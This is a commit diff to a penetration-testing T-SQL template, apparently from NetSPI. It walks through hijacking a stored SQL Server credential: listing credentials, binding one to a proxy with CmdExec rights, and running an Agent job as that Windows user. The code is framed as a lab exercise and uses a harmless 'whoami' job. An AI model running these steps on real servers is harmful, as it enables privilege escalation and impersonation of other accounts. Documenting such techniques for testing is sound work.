Update Get-Credentials-Hijack.tsql

NetSPI · Aug 20, 2024 · d5250eb · d5250eb
1 parent eec48d6
commit d5250eb
Showing 1 changed file with 58 additions and 20 deletions.
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -1,20 +1,59 @@
 -- Tested and worked - SQL Server v2014 instance
-
---------------------------
--- Create a new credential named 'MyCredential' - for testing
---------------------------
+-- Author: Scott Sutherland @_nullbind (Twitter)
+
+-- #################################
+-- LAB SETUP SUMMARY
+--- #################################
+-- 1. Install local instance
+-- 2. Create local OS user named 'testuser'.
+-- 3. Log into SQL Server instance as a sysadmin and create credential.
+
+-- #################################
+-- LAB SETUP SUMMARY
+-- #################################
+-- 1. Log into the SQL Server instance as a sysadmin.
+-- 2. List credentials.
+-- 3. List proxy accounts.
+-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition.
+-- 4. Create Agent job that uses the proxy account.
+-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context.
+-- 6. Confirm execution by reviewing history.
+
+--- #################################
+--  Walk Through Below
+--- #################################
+
+----------------------------------------------------
+-- Create a new credential named 'MyCredential' for testing (for lab only)
+----------------------------------------------------
 CREATE CREDENTIAL [MyCredential]
-WITH IDENTITY = 'machinename\osusername', 
+WITH IDENTITY = 'yourcomputernamehere\testuser', 
 SECRET = 'P@ssw0rd!';
 
---------------------------
--- Get list of all credentials
---------------------------
+----------------------------------------------------
+-- Get a list of all credentials
+----------------------------------------------------
 select * from sys.credentials 
 
---------------------------
--- Create a Proxy Using the Target Credential
---------------------------
+----------------------------------------------------
+-- Get a list proxies
+----------------------------------------------------
+USE msdb;
+GO
+
+SELECT 
+    proxy_id,
+    name AS proxy_name,
+    credential_id,
+    enabled
+FROM 
+    dbo.sysproxies;
+GO
+
+----------------------------------------------------
+-- Create a Proxy Using the Target Credential (if needed)
+----------------------------------------------------
+
 USE msdb;
 GO
 
@@ -26,10 +65,9 @@ EXEC sp_grant_proxy_to_subsystem
   @proxy_name = N'MyCredentialProxy', 
   @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem
 
---------------------------
--- List Proxies
---------------------------
-
+----------------------------------------------------
+-- Get a list proxies - again
+----------------------------------------------------
 USE msdb;
 GO
 
@@ -42,9 +80,9 @@ FROM
     dbo.sysproxies;
 GO
 
---------------------------
+----------------------------------------------------
 -- Create the SQL Server Agent Job Configured to use the Proxy Account
---------------------------
+----------------------------------------------------
 
 USE msdb;
 GO
@@ -76,10 +114,11 @@ EXEC sp_add_jobserver
   @job_name = N'WhoAmIJob', 
   @server_name = N'(LOCAL)'; -- The server where the job will run
 
---------------------------
+----------------------------------------------------
 -- Get List of Proxy Account used by Agent Jobs
 -- Show job, step, proxy, cred, and identity
---------------------------
+----------------------------------------------------
+
 USE msdb;
 GO
 
@@ -103,7 +142,6 @@ WHERE
 ORDER BY 
     jobs.name, steps.step_id;
 
-
 --------------------------
 -- Execute the Job
 --------------------------